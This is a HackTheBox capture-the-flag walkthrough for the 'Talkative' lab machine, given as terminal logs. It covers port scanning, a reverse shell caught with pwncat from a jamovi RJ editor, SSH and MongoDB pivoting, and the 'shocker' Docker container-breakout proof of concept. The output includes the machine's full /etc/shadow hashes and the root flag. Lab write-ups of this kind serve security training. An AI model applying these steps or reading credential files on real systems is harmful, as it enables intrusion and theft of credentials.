Posted onEdited onInHackTheBox walkthroughViews: Word count in article: 2.6kReading time ≈9 mins.
introduce
OS: Linux Difficulty: Hard Points: 40 Release: 09 Apr 2022 IP: 10.10.11.155
Enumeration
NMAP
1 2 3 4 5 6 7 8
┌──(root💀kali)-[~/hackthebox/machine/talkactive] └─# nmap -sV -v -p- --min-rate=10000 10.10.11.155 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 3000/tcp open ppp? 8080/tcp open http Tornado httpd 5.0 8081/tcp open http Tornado httpd 5.0 8082/tcp open http Tornado httpd 5.0
we found several web service:
Bolt CMS
jamovi 0.9.5.5
ROCKET.CHAT
initial shell
go to :8080, open RJ editor add this line excecute ruby command to get a shell. =>
┌──(root💀kali)-[~/hackthebox/machine/talkactive] └─# pwncat-cs -lp 1234 [09:52:38] Welcome to pwncat 🐈! __main__.py:164 [09:54:49] received connection from 10.10.11.155:60622 bind.py:84 [09:54:56] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash manager.py:957 [09:54:59] 10.10.11.155:60622: registered new host w/ db manager.py:957 (local) pwncat$ back (remote) www-data@ad8ae3998918:/$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var (remote) www-data@ad8ae3998918:/$ ssh saul@172.18.0.1 The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established. ECDSA key fingerprint is SHA256:kUPIZ6IPcxq7Mei4nUzQI3JakxPUtkTlEejtabx4wnY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Could not create directory '/var/www/.ssh' (Permission denied). Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). saul@172.18.0.1's password: Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-81-generic x86_64)
$ wget https://downloads.mongodb.com/compass/mongodb-mongosh_1.3.1_amd64.deb $ dpkg -i mongodb-mongosh_1.3.1_amd64.deb ┌──(root💀kali)-[~/hackthebox/machine/talkactive] └─# mongosh "mongodb://LOCALHOST:27017" Current Mongosh Log ID: 6252e6b51f6c27d3c8cfc72a Connecting to: mongodb://LOCALHOST:27017/?directConnection=true&appName=mongosh+1.3.1 Using MongoDB: 4.0.26 Using Mongosh: 1.3.1
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
------ The server generated these startup warnings when booting: 2022-04-10T12:32:16.345+0000: 2022-04-10T12:32:16.345+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine 2022-04-10T12:32:16.345+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem 2022-04-10T12:32:18.390+0000: 2022-04-10T12:32:18.390+0000: ** WARNING: Access control is not enabled for the database. 2022-04-10T12:32:18.390+0000: ** Read and write access to data and configuration is unrestricted. 2022-04-10T12:32:18.391+0000: ------
(local) pwncat$ upload ./a.out /root/static /root/static ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 824.1/824.1 KB • ? • 0:00:00 [10:53:06] uploaded 824.11KiB in 13.93 seconds upload.py:76 (local) pwncat$ upload ./shocker /root/shocker /root/shocker ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00 [10:53:48] uploaded 17.21KiB in 4.49 seconds upload.py:76 (local) pwncat$ upload ./shadow /root/shadow /root/shadow ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00 [10:53:57] uploaded 17.21KiB in 4.49 seconds upload.py:76 (local) pwncat$ back (remote) root@c150397ccd63:/root# chmod 777 * (remote) root@c150397ccd63:/root# ./static [***] docker VMM-container breakout Po(C) 2014 [***] [***] The tea from the 90's kicks your sekurity again. [***] [***] If you have pending sec consulting, I'll happily [***] [***] forward to my friends who drink secury-tea too! [***]
<enter>
[*] Resolving 'root/root.txt' [*] Found lib32 [*] Found .. [*] Found lost+found [*] Found sbin [*] Found bin [*] Found boot [*] Found dev [*] Found run [*] Found lib64 [*] Found . [*] Found var [*] Found home [*] Found media [*] Found proc [*] Found etc [*] Found lib [*] Found libx32 [*] Found cdrom [*] Found root [+] Match: root ino=18 [*] Brute forcing remaining 32bit. This can take a while... [*] (root) Trying: 0x00000000 [*] #=8, 1, char nh[] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; [*] Resolving 'root.txt' [*] Found .. [*] Found .backup [*] Found .config [*] Found .cache [*] Found .local [*] Found .ssh [*] Found . [*] Found .profile [*] Found .bashrc [*] Found root.txt [+] Match: root.txt ino=110097 [*] Brute forcing remaining 32bit. This can take a while... [*] (root.txt) Trying: 0x00000000 [*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00}; [!] Got a final handle! [*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00}; [!] Win! /etc/shadow output follows: 99a37c0a5b01ffc4ad1204d0dd1bc884
(remote) root@c150397ccd63:/root# ./shadow [***] docker VMM-container breakout Po(C) 2014 [***] [***] The tea from the 90's kicks your sekurity again. [***] [***] If you have pending sec consulting, I'll happily [***] [***] forward to my friends who drink secury-tea too! [***]
<enter>
[*] Resolving 'etc/shadow' [*] Found lib32 [*] Found .. [*] Found lost+found [*] Found sbin [*] Found bin [*] Found boot [*] Found dev [*] Found run [*] Found lib64 [*] Found . [*] Found var [*] Found home [*] Found media [*] Found proc [*] Found etc [+] Match: etc ino=393217 [*] Brute forcing remaining 32bit. This can take a while... [*] (etc) Trying: 0x00000000 [*] #=8, 1, char nh[] = {0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00}; [*] Resolving 'shadow' [*] Found modules-load.d [*] Found lsb-release [*] Found rsyslog.conf [*] Found rc6.d [*] Found calendar [*] Found fstab [*] Found shadow [+] Match: shadow ino=393228 [*] Brute forcing remaining 32bit. This can take a while... [*] (shadow) Trying: 0x00000000 [*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00}; [!] Got a final handle! [*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00}; [!] Win! /etc/shadow output follows: root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7::: daemon:*:18659:0:99999:7::: bin:*:18659:0:99999:7::: sys:*:18659:0:99999:7::: sync:*:18659:0:99999:7::: games:*:18659:0:99999:7::: man:*:18659:0:99999:7::: lp:*:18659:0:99999:7::: mail:*:18659:0:99999:7::: news:*:18659:0:99999:7::: uucp:*:18659:0:99999:7::: proxy:*:18659:0:99999:7::: www-data:*:18659:0:99999:7::: backup:*:18659:0:99999:7::: list:*:18659:0:99999:7::: irc:*:18659:0:99999:7::: gnats:*:18659:0:99999:7::: nobody:*:18659:0:99999:7::: systemd-network:*:18659:0:99999:7::: systemd-resolve:*:18659:0:99999:7::: systemd-timesync:*:18659:0:99999:7::: messagebus:*:18659:0:99999:7::: syslog:*:18659:0:99999:7::: _apt:*:18659:0:99999:7::: tss:*:18659:0:99999:7::: uuidd:*:18659:0:99999:7::: tcpdump:*:18659:0:99999:7::: landscape:*:18659:0:99999:7::: pollinate:*:18659:0:99999:7::: usbmux:*:18849:0:99999:7::: sshd:*:18849:0:99999:7::: systemd-coredump:!!:18849:::::: lxd:!:18849:::::: saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::
we see both Dynamic compilation and Static compilation file works, we are done
Summary of knowledge
RJ editor get shell
pwncat upload and download files
bolt cms get shell
chisel port forward MongoDB 27017 port
update admin’s bcrypt hash to change the password
rocket.chat rce
shocker: docker PoC VMM-container breakout to get root flag
Contact me
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…